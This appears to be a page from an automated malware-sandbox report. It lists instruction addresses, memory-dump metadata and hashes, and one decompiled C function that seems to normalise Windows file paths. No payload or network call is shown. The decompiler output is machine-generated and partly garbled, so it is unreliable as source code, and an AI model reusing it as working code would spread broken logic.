                                                                                                    0x00b56038
                                                                                                    0x00b5603e
                                                                                                    0x00b56048
                                                                                                    0x00b56049
                                                                                                    0x00b5604a
                                                                                                    0x00b5604b
                                                                                                    0x00b5604c
                                                                                                    0x00b5604d
                                                                                                    0x00b56053
                                                                                                    0x00b56054
                                                                                                    0x00b56054
                                                                                                    0x00b56062
                                                                                                    0x00b56065
                                                                                                    0x00b56067
                                                                                                    0x00b5606a
                                                                                                    0x00b56070
                                                                                                    0x00b56075
                                                                                                    0x00b56076
                                                                                                    0x00b56081
                                                                                                    0x00b56087
                                                                                                    0x00b56095
                                                                                                    0x00b56099
                                                                                                    0x00b5609e
                                                                                                    0x00b560a4
                                                                                                    0x00b560ae
                                                                                                    0x00b560b0
                                                                                                    0x00b560b3
                                                                                                    0x00b560b6
                                                                                                    0x00b560b8
                                                                                                    0x00b560ba
                                                                                                    0x00b560ba
                                                                                                    0x00b560ba
                                                                                                    0x00b560ba
                                                                                                    0x00b560be
                                                                                                    0x00b560c0
                                                                                                    0x00b560c5
                                                                                                    0x00b560c5
                                                                                                    0x00b560c5
                                                                                                    0x00b560c6
                                                                                                    0x00b560cd
                                                                                                    0x00b56114
                                                                                                    0x00b560cf
                                                                                                    0x00b560cf
                                                                                                    0x00b560d4
                                                                                                    0x00b560d5
                                                                                                    0x00b560da
                                                                                                    0x00b560db
                                                                                                    0x00b560e1
                                                                                                    0x00b560e2
                                                                                                    0x00b560e8
                                                                                                    0x00b560f8
                                                                                                    0x00b560fd
                                                                                                    0x00b560fe
                                                                                                    0x00b56102
                                                                                                    0x00b56104
                                                                                                    0x00b56107
                                                                                                    0x00b56109
                                                                                                    0x00b5610b
                                                                                                    0x00b5610b
                                                                                                    0x00b5610b
                                                                                                    0x00b5610b
                                                                                                    0x00b5610f
                                                                                                    0x00b5610f
                                                                                                    0x00b56117
                                                                                                    0x00b5611a
                                                                                                    0x00b5611f
                                                                                                    0x00b56125
                                                                                                    0x00b56134
                                                                                                    0x00b56139
                                                                                                    0x00b5613f
                                                                                                    0x00b56146
                                                                                                    0x00b56148
                                                                                                    0x00b5614b
                                                                                                    0x00b5614d
                                                                                                    0x00b5614f
                                                                                                    0x00b5614f
                                                                                                    0x00b5614f
                                                                                                    0x00b5614f
                                                                                                    0x00b56153
                                                                                                    0x00b56159
                                                                                                    0x00b56159
                                                                                                    0x00b5615c
                                                                                                    0x00b56163
                                                                                                    0x00b56169
                                                                                                    0x00b5616c
                                                                                                    0x00b56172
                                                                                                    0x00b56181
                                                                                                    0x00b56186
                                                                                                    0x00b56187
                                                                                                    0x00b5618b
                                                                                                    0x00b56191
                                                                                                    0x00b56195
                                                                                                    0x00b561a3
                                                                                                    0x00b561bb
                                                                                                    0x00b561c0
                                                                                                    0x00b561c3
                                                                                                    0x00b561cc
                                                                                                    0x00b561d0
                                                                                                    0x00b561dc
                                                                                                    0x00b561de
                                                                                                    0x00b561e1
                                                                                                    0x00b561e4
                                                                                                    0x00b561e6
                                                                                                    0x00b561e8
                                                                                                    0x00b561e8
                                                                                                    0x00b561e8
                                                                                                    0x00b561e8
                                                                                                    0x00b561e6
                                                                                                    0x00b561ec
                                                                                                    0x00b561f3
                                                                                                    0x00b56203
                                                                                                    0x00b56209
                                                                                                    0x00b5620a
                                                                                                    0x00b56216
                                                                                                    0x00b5621d
                                                                                                    0x00b56227
                                                                                                    0x00b56241
                                                                                                    0x00b56246
                                                                                                    0x00b5624c
                                                                                                    0x00b56257
                                                                                                    0x00b56259
                                                                                                    0x00b5625c
                                                                                                    0x00b5625e
                                                                                                    0x00b56260
                                                                                                    0x00b56260
                                                                                                    0x00b56260
                                                                                                    0x00b56260
                                                                                                    0x00b5625e
                                                                                                    0x00b56264
                                                                                                    0x00b56267
                                                                                                    0x00b56269
                                                                                                    0x00b56315
                                                                                                    0x00b56315
                                                                                                    0x00b5631b
                                                                                                    0x00b5631e
                                                                                                    0x00b56324
                                                                                                    0x00b56327
                                                                                                    0x00b5632f
                                                                                                    0x00b56330
                                                                                                    0x00b56333
                                                                                                    0x00b5633a
                                                                                                    0x00b5633c
                                                                                                    0x00b56335
                                                                                                    0x00b56335
                                                                                                    0x00b56335
                                                                                                    0x00b5633f
                                                                                                    0x00b56342
                                                                                                    0x00b5634c
                                                                                                    0x00b56352
                                                                                                    0x00b56355
                                                                                                    0x00b56355
                                                                                                    0x00b56359
                                                                                                    0x00000000
                                                                                                    0x00b5626f
                                                                                                    0x00b56275
                                                                                                    0x00b56275
                                                                                                    0x00b56278
                                                                                                    0x00b5627e
                                                                                                    0x00b5627e
                                                                                                    0x00b56281
                                                                                                    0x00b56287
                                                                                                    0x00b5628d
                                                                                                    0x00b56298
                                                                                                    0x00b5629c
                                                                                                    0x00b562a2
                                                                                                    0x00b5629e
                                                                                                    0x00b5629e
                                                                                                    0x00b5629e
                                                                                                    0x00b562a7
                                                                                                    0x00b562a7
                                                                                                    0x00b562aa
                                                                                                    0x00b562b0
                                                                                                    0x00b562f0
                                                                                                    0x00b562f0
                                                                                                    0x00b562f2
                                                                                                    0x00b562f8
                                                                                                    0x00b562fd
                                                                                                    0x00b562b2
                                                                                                    0x00b562b2
                                                                                                    0x00b562b2
                                                                                                    0x00b562b5
                                                                                                    0x00b562dd
                                                                                                    0x00b562e2
                                                                                                    0x00b562e5
                                                                                                    0x00b562b7
                                                                                                    0x00b562b8
                                                                                                    0x00b562bb
                                                                                                    0x00b562bd
                                                                                                    0x00b562c0
                                                                                                    0x00b562c4
                                                                                                    0x00b562cd
                                                                                                    0x00b562cd
                                                                                                    0x00b562c0
                                                                                                    0x00b562bb
                                                                                                    0x00b562b5
                                                                                                    0x00b56302
                                                                                                    0x00b56303
                                                                                                    0x00b56305
                                                                                                    0x00b56305
                                                                                                    0x00b56305
                                                                                                    0x00b5630c
                                                                                                    0x00b5630c
                                                                                                    0x00000000
                                                                                                    0x00b5627e
                                                                                                    0x00b56269
                                                                                                    0x00b55eac
                                                                                                    0x00b55ebb
                                                                                                    0x00b55ebe
                                                                                                    0x00b55ecb
                                                                                                    0x00b55ecb
                                                                                                    0x00b55ece
                                                                                                    0x00b55ece
                                                                                                    0x00b55ed4
                                                                                                    0x00b55ed7
                                                                                                    0x00b55ed9
                                                                                                    0x00b55edb
                                                                                                    0x00b55edb
                                                                                                    0x00b55ee1
                                                                                                    0x00b55ee1
                                                                                                    0x00b55ee3
                                                                                                    0x00b55f20
                                                                                                    0x00b55f20
                                                                                                    0x00b55ee5
                                                                                                    0x00b55ee5
                                                                                                    0x00b55ee5
                                                                                                    0x00b55ee8
                                                                                                    0x00b55f11
                                                                                                    0x00b55f18
                                                                                                    0x00b55eea
                                                                                                    0x00b55eea
                                                                                                    0x00b55eed
                                                                                                    0x00b55ef2
                                                                                                    0x00b55ef8
                                                                                                    0x00b55efb
                                                                                                    0x00b55f0a
                                                                                                    0x00b55f0a
                                                                                                    0x00b55eed
                                                                                                    0x00b55ee8
                                                                                                    0x00b55f22
                                                                                                    0x00b55f28
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55f30
                                                                                                    0x00b55f31
                                                                                                    0x00b55f37
                                                                                                    0x00b55f3a
                                                                                                    0x00b55f3d
                                                                                                    0x00b55f44
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55f46
                                                                                                    0x00b55f48
                                                                                                    0x00b55f4d
                                                                                                    0x00000000
                                                                                                    0x00b55f4d
                                                                                                    0x00b55dda
                                                                                                    0x00b55ddf
                                                                                                    0x00000000
                                                                                                    0x00b55ddf
                                                                                                    0x00b55dd8
                                                                                                    0x00b55da7
                                                                                                    0x00b55da9
                                                                                                    0x00b55dac
                                                                                                    0x00b55dae
                                                                                                    0x00000000
                                                                                                    0x00b55db4
                                                                                                    0x00b55db4
                                                                                                    0x00000000
                                                                                                    0x00b55db4
                                                                                                    0x00b55dae
                                                                                                    0x00b55d88
                                                                                                    0x00b55d8d
                                                                                                    0x00b56363
                                                                                                    0x00b56369
                                                                                                    0x00b5636a
                                                                                                    0x00b56370
                                                                                                    0x00b56372
                                                                                                    0x00b5637a
                                                                                                    0x00b5637b
                                                                                                    0x00b5637d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b5637f
                                                                                                    0x00b56385
                                                                                                    0x00000000
                                                                                                    0x00b56385
                                                                                                    0x00b55d38
                                                                                                    0x00b55d3b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d3b
                                                                                                    0x00b55d27
                                                                                                    0x00b55d29
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b56360
                                                                                                    0x00000000
                                                                                                    0x00b56360
                                                                                                    0x00b55c10
                                                                                                    0x00b55c10
                                                                                                    0x00b563da
                                                                                                    0x00b563e5
                                                                                                    0x00b563e5

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4fee3702e3bbe0546ea062259f7290db72c68bbcb153ca8b0d254fd7830d8914
                                                                                                    • Instruction ID: fd16fa0d8bf575777c1cead6933ec7ae5fa8247e56c144d0fa881aa6a177af30
                                                                                                    • Opcode Fuzzy Hash: 4fee3702e3bbe0546ea062259f7290db72c68bbcb153ca8b0d254fd7830d8914
                                                                                                    • Instruction Fuzzy Hash: E5425871900629CFDB24CF68C881BA9B7F1FF49305F5581EAD94DAB242E7349A89CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AA6E30, Relevance: .5, Instructions: 481COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E00AA6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0xb5fca8);
				_push(0xad17f0);
				_push( *[fs:0x0]);
				_t312 =  *0xb7d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E00ACFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E00AA74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E00AB9BC6( &_v52, 0xa61080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E00AC9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E00B046A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M00AA749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E00A852A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L00A92600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L00A92600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L00B04735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E00ACBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E00AB2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L00B04658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E00AB9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E00A852A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L00A883AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E00A852A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L00A883AE(_t428);
														L80:
														E00AB9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0xa61080;
														_v72 =  *0xa61080;
														__eax =  *0xa61084;
														_v68 =  *0xa61084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E00AB9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E00AA746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E00ACB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                                                                                    0x00aa6e30
                                                                                                    0x00aa6e35
                                                                                                    0x00aa6e37
                                                                                                    0x00aa6e3c
                                                                                                    0x00aa6e47
                                                                                                    0x00aa6e4b
                                                                                                    0x00aa6e50
                                                                                                    0x00aa6e53
                                                                                                    0x00aa6e55
                                                                                                    0x00aa6e5b
                                                                                                    0x00aa6e5f
                                                                                                    0x00aa6e65
                                                                                                    0x00aa6e68
                                                                                                    0x00aa6e6a
                                                                                                    0x00aa6e6d
                                                                                                    0x00aa6e70
                                                                                                    0x00aa6e73
                                                                                                    0x00aa6e76
                                                                                                    0x00aa6e79
                                                                                                    0x00aa6e7c
                                                                                                    0x00aa6e7f
